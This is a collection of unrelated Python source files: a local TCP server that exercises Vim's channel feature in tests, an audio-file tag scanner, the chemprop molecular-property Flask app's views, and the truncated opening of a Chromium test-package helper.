class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
    """Handles one Vim channel connection for test_channel.vim.

    Messages are JSON arrays [seq, expr]: a non-negative seq is a request
    that expects a [seq, response] reply; a negative seq carries the result
    of an earlier "expr" command sent to Vim.
    """

    def handle(self):
        print("=== socket opened ===")
        while True:
            try:
                received = self.request.recv(4096).decode('utf-8')
            except socket.error:
                print("=== socket error ===")
                break
            except IOError:
                print("=== socket closed ===")
                break
            if received == '':
                print("=== socket closed ===")
                break
            print("received: {0}".format(received))

            # We may receive two messages at once. Take the part up to the
            # matching "]" (recognized by finding "][").
            todo = received
            while todo != '':
                splitidx = todo.find('][')
                if splitidx < 0:
                    used = todo
                    todo = ''
                else:
                    used = todo[:splitidx + 1]
                    todo = todo[splitidx + 1:]
                if used != received:
                    print("using: {0}".format(used))

                try:
                    decoded = json.loads(used)
                except ValueError:
                    print("json decoding failed")
                    decoded = [-1, '']

                # Send a response if the sequence number is positive.
                if decoded[0] >= 0:
                    if decoded[1] == 'hello!':
                        # simply send back a string
                        response = "got it"
                    elif decoded[1].startswith("echo "):
                        # send back the argument
                        response = decoded[1][5:]
                        time.sleep(0.01)
                    elif decoded[1] == 'make change':
                        # Send two ex commands at the same time, before
                        # replying to the request.
                        cmd = '["ex","call append(\\"$\\",\\"added1\\")"]'
                        cmd += '["ex","call append(\\"$\\",\\"added2\\")"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'bad command':
                        cmd = '["ex","foo bar"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'do normal':
                        # Send a normal command.
                        cmd = '["normal","G$s more\u001b"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'eval-works':
                        # Send an eval request.  We ignore the response.
                        cmd = '["expr","\\"foo\\" . 123", -1]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'eval-special':
                        # Send an eval request.  We ignore the response.
                        cmd = '["expr","\\"foo\x7f\x10\x01bar\\"", -2]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'eval-getline':
                        # Send an eval request.  We ignore the response.
                        cmd = '["expr","getline(3)", -3]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'eval-fails':
                        # Send an eval request that will fail.
                        cmd = '["expr","xxx", -4]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'eval-error':
                        # Send an eval request that works but the result can't
                        # be encoded.
                        cmd = '["expr","function(\\"tr\\")", -5]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'eval-bad':
                        # Send an eval request missing the third argument.
                        cmd = '["expr","xxx"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'malformed1':
                        cmd = '["ex",":"]wrong!["ex","smi"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                        time.sleep(0.01)
                    elif decoded[1] == 'malformed2':
                        cmd = '"unterminated string'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                        # Need to wait for Vim to give up, otherwise the double
                        # quote in the "ok" response terminates the string.
                        time.sleep(0.2)
                    elif decoded[1] == 'malformed3':
                        cmd = '["ex","missing ]"'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                        # Need to wait for Vim to give up, otherwise the ]
                        # in the "ok" response terminates the list.
                        time.sleep(0.2)
                    elif decoded[1] == 'split':
                        # Send a message split over two writes, to test that
                        # Vim reassembles it.
                        cmd = '["ex","let '
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        time.sleep(0.01)
                        cmd = 'g:split = 123"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'an expr':
                        # Send an expr request.
                        cmd = '["expr","setline(\\"$\\", [\\"one\\",\\"two\\",\\"three\\"])"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'call-func':
                        cmd = '["call","MyFunction",[1,2,3], 0]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'redraw':
                        cmd = '["redraw",""]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'redraw!':
                        cmd = '["redraw","force"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'empty-request':
                        cmd = '[]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'eval-result':
                        # Send back the last received eval result.
                        response = last_eval
                    elif decoded[1] == 'call me':
                        cmd = '[0,"we called you"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "ok"
                    elif decoded[1] == 'call me again':
                        cmd = '[0,"we did call you"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = ""
                    elif decoded[1] == 'send zero':
                        cmd = '[0,"zero index"]'
                        print("sending: {0}".format(cmd))
                        self.request.sendall(cmd.encode('utf-8'))
                        response = "sent zero"
                    elif decoded[1] == 'close me':
                        print("closing")
                        self.request.close()
                        response = ""
                    elif decoded[1] == 'wait a bit':
                        time.sleep(0.2)
                        response = "waited"
                    elif decoded[1] == '!quit!':
                        # we're done
                        self.server.shutdown()
                        return
                    elif decoded[1] == '!crash!':
                        # Crash!  (deliberate ZeroDivisionError)
                        42 / 0
                    else:
                        response = "what?"

                    if response == "":
                        print("no response")
                    else:
                        encoded = json.dumps([decoded[0], response])
                        print("sending: {0}".format(encoded))
                        self.request.sendall(encoded.encode('utf-8'))

                # Negative numbers are used for "eval" responses.
                elif decoded[0] < 0:
                    # NOTE(review): last_eval is a plain local of handle(); an
                    # 'eval-result' request arriving before any eval response
                    # makes `response = last_eval` above raise
                    # UnboundLocalError — confirm the test always sends an
                    # eval first.
                    last_eval = decoded
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """TCP server that handles each connection in its own thread."""
    pass
def writePortInFile(port):
    # Write the port number in Xportnr, so that the test knows it.
    # Fix: use a context manager so the file is closed even if the write
    # fails (the original left it open on error).
    with open("Xportnr", "w") as f:
        f.write("{0}".format(port))
if __name__ == "__main__":
    HOST, PORT = "localhost", 0

    # Wait half a second before opening the port to test waittime in ch_open().
    # We do want to get the port number, get that first.  We cannot open the
    # socket, guess a port is free.
    if len(sys.argv) >= 2 and sys.argv[1] == 'delay':
        PORT = 13684
        writePortInFile(PORT)

        print("Wait for it...")
        time.sleep(0.5)

    server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
    # PORT 0 means the OS picked a free port; read the actual one back.
    ip, port = server.server_address

    # Start a thread with the server.  That thread will then start a new thread
    # for each connection.
    server_thread = threading.Thread(target=server.serve_forever)
    server_thread.start()

    writePortInFile(port)

    print("Listening on port {0}".format(port))

    # Main thread terminates, but the server continues running
    # until server.shutdown() is called.
    # NOTE(review): Thread.isAlive() was removed in Python 3.9 (use
    # is_alive()); kept here for Python 2 compatibility.
    try:
        while server_thread.isAlive():
            server_thread.join(1)
    except (KeyboardInterrupt, SystemExit):
        server.shutdown()
|
LocalFileInterfaz.py | import pathlib
import hashlib
import shutil
import threading
import os
import logging
from pprint import pprint
from mutagen.easyid3 import EasyID3
class LocalFileInterfaz(object):
    """Scans input directories for audio files and collects their ID3 tags."""

    def __init__(self, dirsInput=None, dirOutput=None):
        """Create a scanner.

        :param dirsInput: list of directories to scan (default: empty list).
        :param dirOutput: destination directory used by cpyArchivo().

        Bug fix: the original used a mutable default (``dirsInput=[]``),
        which is shared across every instance created without the argument.
        """
        self.dirsInput = [] if dirsInput is None else dirsInput
        self.dirOutput = dirOutput
        # Extensions treated as audio files.
        self.tipos = [".mp3", ".flac", ".aac", ".ogg", ".m4a"]
        self.localTracks = []
        # Shape of each entry appended to localTracks.
        self.templateTrack = {"titulo": "",
                              "artista": "",
                              "album": "",
                              "path": ""}

    def procesarDirsInput(self):
        """Reset localTracks and rescan every configured input directory."""
        self.localTracks = []
        for directorio in self.dirsInput:
            self.getPath(directorio=directorio)

    def getPath(self, directorio):
        """Walk *directorio* and collect tag data for every audio file found."""
        lista = []
        for root, dirs, files in os.walk(directorio):
            for filename in files:
                # NOTE: start() immediately followed by join() makes this
                # effectively sequential; kept to preserve behavior.
                t = threading.Thread(target=self.getDatos,
                                     args=(os.path.join(root, filename), lista))
                t.start()
                t.join()
        self.localTracks.extend(lista)

    def getDatos(self, filename, lista):
        """Append a track dict for *filename* to *lista* if it is audio."""
        ext = pathlib.PurePosixPath(filename).suffix.lower()
        track = {"titulo": "",
                 "artista": "",
                 "album": "",
                 "path": ""}
        if ext in self.tipos:
            try:
                tag = EasyID3(filename)
                track["titulo"] = tag["title"][0]
                # Bug fix: store a string like every other field (the original
                # stored the whole list returned by mutagen, unlike the
                # template and the other fields).
                track["artista"] = tag["artist"][0]
                track["album"] = tag["album"][0]
                track["path"] = filename
                lista.append(track)
            except Exception as e:
                logging.error("Error con este archivo {} {}".format(filename, e))
        else:
            logging.info("Archivo no es audio {}".format(filename))

    def cpyArchivo(self, filnameIn):
        """Copy *filnameIn* into dirOutput, logging (not raising) on failure."""
        try:
            shutil.copy(filnameIn, self.dirOutput)
        except Exception as e:
            logging.error("Error al copiar archivo {} {}".format(filnameIn, e))

    def getLocalTracks(self):
        """Return the list of collected track dicts."""
        return self.localTracks
views.py | """Defines a number of routes/views for the flask app."""
from functools import wraps
import io
import os
import sys
import shutil
from tempfile import TemporaryDirectory, NamedTemporaryFile
import time
from typing import Callable, List, Tuple
import multiprocessing as mp
import zipfile
from flask import json, jsonify, redirect, render_template, request, send_file, send_from_directory, url_for
import numpy as np
from rdkit import Chem
from werkzeug.utils import secure_filename
from chemprop.web.app import app, db
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from chemprop.args import PredictArgs, TrainArgs
from chemprop.constants import MODEL_FILE_NAME, TRAIN_LOGGER_NAME
from chemprop.data import get_data, get_header, get_smiles, get_task_names, validate_data
from chemprop.train import make_predictions, run_training
from chemprop.utils import create_logger, load_task_names, load_args
# Module-level flag — presumably toggled around training runs and reported
# by /receiver; confirm against the (not shown here) train() view.
TRAINING = 0
# Shared double updated by progress_bar() and polled by the /receiver route.
PROGRESS = mp.Value('d', 0.0)
def check_not_demo(func: Callable) -> Callable:
    """
    View wrapper, which will redirect request to site
    homepage if app is run in DEMO mode.

    :param func: A view which performs sensitive behavior.
    :return: A view with behavior adjusted based on DEMO flag.
    """
    @wraps(func)
    def guarded_view(*args, **kwargs):
        if not app.config['DEMO']:
            return func(*args, **kwargs)
        return redirect(url_for('home'))

    return guarded_view
def progress_bar(args: "TrainArgs", progress: mp.Value, poll_interval: float = 1.0):
    """
    Updates a progress bar displayed during training.

    Polls the training run's verbose.log until the final epoch is seen,
    writing the completion percentage into the shared value.

    :param args: Arguments (needs .save_dir and .epochs).
    :param progress: The current progress (shared float, 0-100).
    :param poll_interval: Seconds to sleep between polls. The original used
        time.sleep(0), which busy-waited at 100% CPU; a real interval is now
        used (new keyword is backward compatible).
    """
    # no code to handle crashes in model training yet, though
    current_epoch = -1
    log_path = os.path.join(args.save_dir, 'verbose.log')
    while current_epoch < args.epochs - 1:
        if os.path.exists(log_path):
            with open(log_path, 'r') as f:
                content = f.read()
            # Advance at most one epoch per poll as its marker appears.
            if 'Epoch ' + str(current_epoch + 1) in content:
                current_epoch += 1
                progress.value = (current_epoch + 1) * 100 / args.epochs
        time.sleep(poll_interval)
def find_unused_path(path: str) -> str:
    """
    Given an initial path, finds an unused path by appending different numbers to the filename.

    :param path: An initial path.
    :return: An unused path.
    """
    if not os.path.exists(path):
        return path

    stem, extension = os.path.splitext(path)
    candidate, suffix = path, 2
    while os.path.exists(candidate):
        candidate = f'{stem}{suffix}{extension}'
        suffix += 1

    return candidate
def name_already_exists_message(thing_being_named: str, original_name: str, new_name: str) -> str:
    """
    Creates a message about a path already existing and therefore being renamed.

    :param thing_being_named: The thing being renamed (ex. Data, Checkpoint).
    :param original_name: The original name of the object.
    :param new_name: The new name of the object.
    :return: A string with a message about the changed name.
    """
    # Bug fix: the original message was missing the closing quote after
    # {original_name} ('"{original_name} already exists').
    return f'{thing_being_named} "{original_name}" already exists. ' \
           f'Saving to "{new_name}".'
def get_upload_warnings_errors(upload_item: str) -> Tuple[List[str], List[str]]:
    """
    Gets any upload warnings passed along in the request.

    :param upload_item: The thing being uploaded (ex. Data, Checkpoint).
    :return: A tuple with a list of warning messages and a list of error messages.
    """
    def decode_param(param_name: str):
        # Query parameters arrive JSON-encoded; absent means None.
        raw = request.args.get(param_name)
        return json.loads(raw) if raw is not None else None

    return (decode_param(f'{upload_item}_upload_warnings'),
            decode_param(f'{upload_item}_upload_errors'))
def format_float(value: float, precision: int = 4) -> str:
    """
    Formats a float value to a specific precision.

    :param value: The float value to format.
    :param precision: The number of decimal places to use.
    :return: A string containing the formatted float.
    """
    return '{0:.{1}f}'.format(value, precision)
def format_float_list(array: List[float], precision: int = 4) -> List[str]:
    """
    Formats a list of float values to a specific precision.

    :param array: A list of float values to format.
    :param precision: The number of decimal places to use.
    :return: A list of strings containing the formatted floats.
    """
    # Formatting inlined (identical to format_float) so the function is
    # self-contained.
    return [f'{value:.{precision}f}' for value in array]
@app.route('/receiver', methods=['POST'])
@check_not_demo
def receiver():
    """Receiver monitoring the progress of training.

    Returns JSON with the shared progress percentage and the module-level
    TRAINING flag, polled by the training page's JavaScript.
    """
    return jsonify(progress=PROGRESS.value, training=TRAINING)
@app.route('/')
def home():
    """Renders the home page."""
    return render_template('home.html', users=db.get_all_users())
@app.route('/create_user', methods=['GET', 'POST'])
@check_not_demo
def create_user():
    """
    If a POST request is made, creates a new user.

    Renders the create_user page.
    """
    if request.method == 'GET':
        return render_template('create_user.html', users=db.get_all_users())

    # POST: insert the submitted user name, then redirect back so a browser
    # refresh does not resubmit the form (post/redirect/get pattern).
    new_name = request.form['newUserName']

    if new_name is not None:
        db.insert_user(new_name)

    return redirect(url_for('create_user'))
def render_train(**kwargs):
    """Renders the train page with specified kwargs."""
    # Pull any upload warnings/errors forwarded via query parameters so they
    # can be displayed alongside the form.
    data_upload_warnings, data_upload_errors = get_upload_warnings_errors('data')

    return render_template('train.html',
                           datasets=db.get_datasets(request.cookies.get('currentUser')),
                           cuda=app.config['CUDA'],
                           gpus=app.config['GPUS'],
                           data_upload_warnings=data_upload_warnings,
                           data_upload_errors=data_upload_errors,
                           users=db.get_all_users(),
                           **kwargs)
@app.route('/train', methods=['GET', 'POST'])
@check_not_demo
def train():
    """Renders the train page and performs training if request method is POST.

    POST: reads the dataset/epochs/ensemble settings from the form, validates
    that the dataset matches the chosen task type, runs training in a temp
    directory, registers the checkpoint and its models in the database, and
    moves the trained .pt files into the checkpoint folder.
    """
    global PROGRESS, TRAINING

    warnings, errors = [], []

    if request.method == 'GET':
        return render_train()

    # Get arguments
    data_name, epochs, ensemble_size, checkpoint_name = \
        request.form['dataName'], int(request.form['epochs']), \
        int(request.form['ensembleSize']), request.form['checkpointName']
    gpu = request.form.get('gpu')
    data_path = os.path.join(app.config['DATA_FOLDER'], f'{data_name}.csv')
    dataset_type = request.form.get('datasetType', 'regression')
    use_progress_bar = request.form.get('useProgressBar', 'True') == 'True'

    # Create and modify args
    args = TrainArgs().parse_args([
        '--data_path', data_path,
        '--dataset_type', dataset_type,
        '--epochs', str(epochs),
        '--ensemble_size', str(ensemble_size),
    ])

    # Get task names
    args.task_names = get_task_names(path=data_path, smiles_columns=[None])

    # Check if regression/classification selection matches data
    data = get_data(path=data_path, smiles_columns=[None])
    targets = data.targets()
    unique_targets = {target for row in targets for target in row if target is not None}

    if dataset_type == 'classification' and len(unique_targets - {0, 1}) > 0:
        errors.append('Selected classification dataset but not all labels are 0 or 1. Select regression instead.')
        return render_train(warnings=warnings, errors=errors)

    if dataset_type == 'regression' and unique_targets <= {0, 1}:
        errors.append('Selected regression dataset but all labels are 0 or 1. Select classification instead.')
        return render_train(warnings=warnings, errors=errors)

    # GPU selection: 'None' disables CUDA, anything else is a device index.
    if gpu is not None:
        if gpu == 'None':
            args.cuda = False
        else:
            args.gpu = int(gpu)

    current_user = request.cookies.get('currentUser')
    if not current_user:
        # Use DEFAULT as current user if the client's cookie is not set.
        current_user = app.config['DEFAULT_USER_ID']

    ckpt_id, ckpt_name = db.insert_ckpt(checkpoint_name,
                                        current_user,
                                        args.dataset_type,
                                        args.epochs,
                                        args.ensemble_size,
                                        len(targets))

    with TemporaryDirectory() as temp_dir:
        args.save_dir = temp_dir

        if use_progress_bar:
            process = mp.Process(target=progress_bar, args=(args, PROGRESS))
            process.start()
            TRAINING = 1

        # Run training
        logger = create_logger(name=TRAIN_LOGGER_NAME, save_dir=args.save_dir, quiet=args.quiet)
        task_scores = run_training(args, data, logger)[args.metrics[0]]

        if use_progress_bar:
            process.join()

        # Reset globals
        TRAINING = 0
        PROGRESS = mp.Value('d', 0.0)

        # Check if name overlap (db.insert_ckpt may have renamed the checkpoint)
        if checkpoint_name != ckpt_name:
            warnings.append(name_already_exists_message('Checkpoint', checkpoint_name, ckpt_name))

        # Move models
        for root, _, files in os.walk(args.save_dir):
            for fname in files:
                if fname.endswith('.pt'):
                    model_id = db.insert_model(ckpt_id)
                    save_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model_id}.pt')
                    # BUG FIX: os.walk already yields |root| prefixed with
                    # args.save_dir; the old os.path.join(args.save_dir, root,
                    # fname) only worked by accident because |root| is absolute
                    # (os.path.join discards components before an absolute one).
                    shutil.move(os.path.join(root, fname), save_path)

    return render_train(trained=True,
                        metric=args.metric,
                        num_tasks=len(args.task_names),
                        task_names=args.task_names,
                        task_scores=format_float_list(task_scores),
                        mean_score=format_float(np.mean(task_scores)),
                        warnings=warnings,
                        errors=errors)
def render_predict(**kwargs):
    """Renders the predict page with specified kwargs.

    Also pulls any checkpoint-upload warnings/errors stashed in the redirect
    query string (see upload_checkpoint).
    """
    checkpoint_upload_warnings, checkpoint_upload_errors = get_upload_warnings_errors('checkpoint')

    return render_template('predict.html',
                           checkpoints=db.get_ckpts(request.cookies.get('currentUser')),
                           cuda=app.config['CUDA'],
                           gpus=app.config['GPUS'],
                           checkpoint_upload_warnings=checkpoint_upload_warnings,
                           checkpoint_upload_errors=checkpoint_upload_errors,
                           users=db.get_all_users(),
                           **kwargs)
@app.route('/predict', methods=['GET', 'POST'])
def predict():
    """Renders the predict page and makes predictions if the method is POST.

    SMILES are taken, in priority order, from the text box, the drawing
    widget, or an uploaded CSV file. Predictions are written to the temp
    folder (see download_predictions) and rendered inline.
    """
    if request.method == 'GET':
        return render_predict()

    # Get arguments
    ckpt_id = request.form['checkpointName']

    if request.form['textSmiles'] != '':
        smiles = request.form['textSmiles'].split()
    elif request.form['drawSmiles'] != '':
        smiles = [request.form['drawSmiles']]
    else:
        # Upload data file with SMILES
        data = request.files['data']
        data_name = secure_filename(data.filename)
        data_path = os.path.join(app.config['TEMP_FOLDER'], data_name)
        data.save(data_path)

        # Check if header is smiles (i.e. the file has no header row)
        possible_smiles = get_header(data_path)[0]
        smiles = [possible_smiles] if Chem.MolFromSmiles(possible_smiles) is not None else []

        # Get remaining smiles
        smiles.extend(get_smiles(data_path))

    # Each molecule is a single-SMILES list (one molecule per datapoint).
    smiles = [[s] for s in smiles]

    models = db.get_models(ckpt_id)
    model_paths = [os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model["id"]}.pt') for model in models]

    task_names = load_task_names(model_paths[0])
    num_tasks = len(task_names)
    gpu = request.form.get('gpu')
    train_args = load_args(model_paths[0])

    # Build arguments
    arguments = [
        '--test_path', 'None',
        '--preds_path', os.path.join(app.config['TEMP_FOLDER'], app.config['PREDICTIONS_FILENAME']),
        '--checkpoint_paths', *model_paths
    ]

    if gpu is not None:
        if gpu == 'None':
            arguments.append('--no_cuda')
        else:
            arguments += ['--gpu', gpu]

    # Handle additional features
    if train_args.features_path is not None:
        # TODO: make it possible to specify the features generator if trained using features_path
        arguments += [
            '--features_generator', 'rdkit_2d_normalized',
            '--no_features_scaling'
        ]
    elif train_args.features_generator is not None:
        arguments += ['--features_generator', *train_args.features_generator]

        if not train_args.features_scaling:
            arguments.append('--no_features_scaling')

    # Parse arguments
    args = PredictArgs().parse_args(arguments)

    # Run predictions
    preds = make_predictions(args=args, smiles=smiles)

    if all(p is None for p in preds):
        return render_predict(errors=['All SMILES are invalid'])

    # BUG FIX: record whether any SMILES failed *before* replacing the None
    # entries below — afterwards `None in preds` is always False, so the
    # invalid-SMILES warning could never be shown.
    any_invalid = any(p is None for p in preds)

    # Replace invalid smiles with message
    invalid_smiles_warning = 'Invalid SMILES String'
    preds = [pred if pred is not None else [invalid_smiles_warning] * num_tasks for pred in preds]

    return render_predict(predicted=True,
                          smiles=smiles,
                          num_smiles=min(10, len(smiles)),
                          show_more=max(0, len(smiles)-10),
                          task_names=task_names,
                          num_tasks=len(task_names),
                          preds=preds,
                          warnings=["List contains invalid SMILES strings"] if any_invalid else None,
                          errors=["No SMILES strings given"] if len(preds) == 0 else None)
@app.route('/download_predictions')
def download_predictions():
    """Downloads the most recent predictions as a .csv file.

    NOTE(review): `cache_timeout` was renamed to `max_age` in Flask 2.0 —
    confirm the pinned Flask version before upgrading.
    """
    return send_from_directory(app.config['TEMP_FOLDER'], app.config['PREDICTIONS_FILENAME'], as_attachment=True, cache_timeout=-1)
@app.route('/data')
@check_not_demo
def data():
    """Renders the data page listing the current user's datasets.

    Upload warnings/errors arrive via the redirect query string (see
    upload_data).
    """
    data_upload_warnings, data_upload_errors = get_upload_warnings_errors('data')

    return render_template('data.html',
                           datasets=db.get_datasets(request.cookies.get('currentUser')),
                           data_upload_warnings=data_upload_warnings,
                           data_upload_errors=data_upload_errors,
                           users=db.get_all_users())
@app.route('/data/upload/<string:return_page>', methods=['POST'])
@check_not_demo
def upload_data(return_page: str):
    """
    Uploads a data .csv file.

    The file is validated in a temp location first; only valid data is
    registered in the database and copied into the data folder.

    :param return_page: The name of the page to render to after uploading the dataset.
    """
    warnings, errors = [], []

    current_user = request.cookies.get('currentUser')
    if not current_user:
        # Use DEFAULT as current user if the client's cookie is not set.
        current_user = app.config['DEFAULT_USER_ID']

    dataset = request.files['dataset']

    with NamedTemporaryFile() as temp_file:
        dataset.save(temp_file.name)
        dataset_errors = validate_data(temp_file.name)

        if len(dataset_errors) > 0:
            errors.extend(dataset_errors)
        else:
            dataset_name = request.form['datasetName']
            # dataset_class = load_args(ckpt).dataset_type  # TODO: SWITCH TO ACTUALLY FINDING THE CLASS
            # Insert first so the DB assigns the id that names the file on disk.
            dataset_id, new_dataset_name = db.insert_dataset(dataset_name, current_user, 'UNKNOWN')

            dataset_path = os.path.join(app.config['DATA_FOLDER'], f'{dataset_id}.csv')

            # db.insert_dataset may have renamed the dataset to avoid a clash.
            if dataset_name != new_dataset_name:
                warnings.append(name_already_exists_message('Data', dataset_name, new_dataset_name))

            shutil.copy(temp_file.name, dataset_path)

    # Warnings/errors travel to the next page through the redirect query string.
    warnings, errors = json.dumps(warnings), json.dumps(errors)

    return redirect(url_for(return_page, data_upload_warnings=warnings, data_upload_errors=errors))
@app.route('/data/download/<int:dataset>')
@check_not_demo
def download_data(dataset: int):
    """
    Downloads a dataset as a .csv file.

    :param dataset: The id of the dataset to download.
    """
    return send_from_directory(app.config['DATA_FOLDER'], f'{dataset}.csv', as_attachment=True, cache_timeout=-1)
@app.route('/data/delete/<int:dataset>')
@check_not_demo
def delete_data(dataset: int):
    """
    Deletes a dataset (its database row and its .csv file on disk).

    :param dataset: The id of the dataset to delete.
    """
    db.delete_dataset(dataset)
    # ROBUSTNESS FIX: the DB row is already gone at this point, so a missing
    # file (e.g. deleted out-of-band or a double-submitted request) should
    # not turn the whole request into a 500.
    try:
        os.remove(os.path.join(app.config['DATA_FOLDER'], f'{dataset}.csv'))
    except FileNotFoundError:
        pass
    return redirect(url_for('data'))
@app.route('/checkpoints')
@check_not_demo
def checkpoints():
    """Renders the checkpoints page listing the current user's checkpoints.

    Upload warnings/errors arrive via the redirect query string (see
    upload_checkpoint).
    """
    checkpoint_upload_warnings, checkpoint_upload_errors = get_upload_warnings_errors('checkpoint')

    return render_template('checkpoints.html',
                           checkpoints=db.get_ckpts(request.cookies.get('currentUser')),
                           checkpoint_upload_warnings=checkpoint_upload_warnings,
                           checkpoint_upload_errors=checkpoint_upload_errors,
                           users=db.get_all_users())
@app.route('/checkpoints/upload/<string:return_page>', methods=['POST'])
@check_not_demo
def upload_checkpoint(return_page: str):
    """
    Uploads a checkpoint .pt file, or a .zip containing several .pt files.

    :param return_page: The name of the page to render after uploading the checkpoint file.
    """
    warnings, errors = [], []

    current_user = request.cookies.get('currentUser')
    if not current_user:
        # Use DEFAULT as current user if the client's cookie is not set.
        current_user = app.config['DEFAULT_USER_ID']

    ckpt = request.files['checkpoint']
    ckpt_name = request.form['checkpointName']
    ckpt_ext = os.path.splitext(ckpt.filename)[1]

    # Collect paths to all uploaded checkpoints (and unzip if necessary)
    temp_dir = TemporaryDirectory()
    # BUG FIX: cleanup() used to run only on the success path, leaking the
    # temp directory whenever load_args/db/shutil raised.
    try:
        ckpt_paths = []

        if ckpt_ext.endswith('.pt'):
            ckpt_path = os.path.join(temp_dir.name, MODEL_FILE_NAME)
            ckpt.save(ckpt_path)
            ckpt_paths = [ckpt_path]
        elif ckpt_ext.endswith('.zip'):
            ckpt_dir = os.path.join(temp_dir.name, 'models')
            zip_path = os.path.join(temp_dir.name, 'models.zip')
            ckpt.save(zip_path)

            with zipfile.ZipFile(zip_path, mode='r') as z:
                z.extractall(ckpt_dir)

            for root, _, fnames in os.walk(ckpt_dir):
                ckpt_paths += [os.path.join(root, fname) for fname in fnames if fname.endswith('.pt')]
        else:
            errors.append(f'Uploaded checkpoint(s) file must be either .pt or .zip but got {ckpt_ext}')

        # Insert checkpoints into database
        if len(ckpt_paths) > 0:
            ckpt_args = load_args(ckpt_paths[0])

            ckpt_id, new_ckpt_name = db.insert_ckpt(ckpt_name,
                                                    current_user,
                                                    ckpt_args.dataset_type,
                                                    ckpt_args.epochs,
                                                    len(ckpt_paths),
                                                    ckpt_args.train_data_size)

            # BUG FIX: emit the rename warning once per upload, not once per
            # model file inside the loop below (which produced duplicates).
            if ckpt_name != new_ckpt_name:
                warnings.append(name_already_exists_message('Checkpoint', ckpt_name, new_ckpt_name))

            for ckpt_path in ckpt_paths:
                model_id = db.insert_model(ckpt_id)
                model_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model_id}.pt')
                shutil.copy(ckpt_path, model_path)
    finally:
        temp_dir.cleanup()

    warnings, errors = json.dumps(warnings), json.dumps(errors)

    return redirect(url_for(return_page, checkpoint_upload_warnings=warnings, checkpoint_upload_errors=errors))
@app.route('/checkpoints/download/<int:checkpoint>')
@check_not_demo
def download_checkpoint(checkpoint: int):
    """
    Downloads a zip of model .pt files for one checkpoint.

    :param checkpoint: The id of the checkpoint to download.
    """
    # NOTE(review): f-string SQL — safe here only because the <int:...> route
    # converter guarantees |checkpoint| is an int; prefer a parameterized
    # query if db.query_db supports placeholders (confirm its signature).
    ckpt = db.query_db(f'SELECT * FROM ckpt WHERE id = {checkpoint}', one=True)
    models = db.get_models(checkpoint)

    # Assemble the zip entirely in memory, then stream it to the client.
    model_data = io.BytesIO()

    with zipfile.ZipFile(model_data, mode='w') as z:
        for model in models:
            model_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model["id"]}.pt')
            z.write(model_path, os.path.basename(model_path))

    model_data.seek(0)

    # NOTE(review): `attachment_filename`/`cache_timeout` were renamed in
    # Flask 2.0 (`download_name`/`max_age`) — confirm the pinned version.
    return send_file(
        model_data,
        mimetype='application/zip',
        as_attachment=True,
        attachment_filename=f'{ckpt["ckpt_name"]}.zip',
        cache_timeout=-1
    )
@app.route('/checkpoints/delete/<int:checkpoint>')
@check_not_demo
def delete_checkpoint(checkpoint: int):
    """
    Deletes a checkpoint from the database.

    NOTE(review): unlike delete_data, this does not appear to remove the
    model .pt files from CHECKPOINT_FOLDER — confirm whether db.delete_ckpt
    handles that, otherwise files are orphaned on disk.

    :param checkpoint: The id of the checkpoint to delete.
    """
    db.delete_ckpt(checkpoint)
    return redirect(url_for('checkpoints'))
|
run_test_package.py | # Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Contains a helper function for deploying and executing a packaged
executable on a Target."""
from __future__ import print_function
import common
import hashlib
import logging
import multiprocessing
import os
import re
import select
import subprocess
import sys
import threading
import uuid
from symbolizer import BuildIdsPaths, RunSymbolizer, SymbolizerFilter
FAR = common.GetHostToolPathFromPlatform('far')
# Amount of time to wait for the termination of the system log output thread.
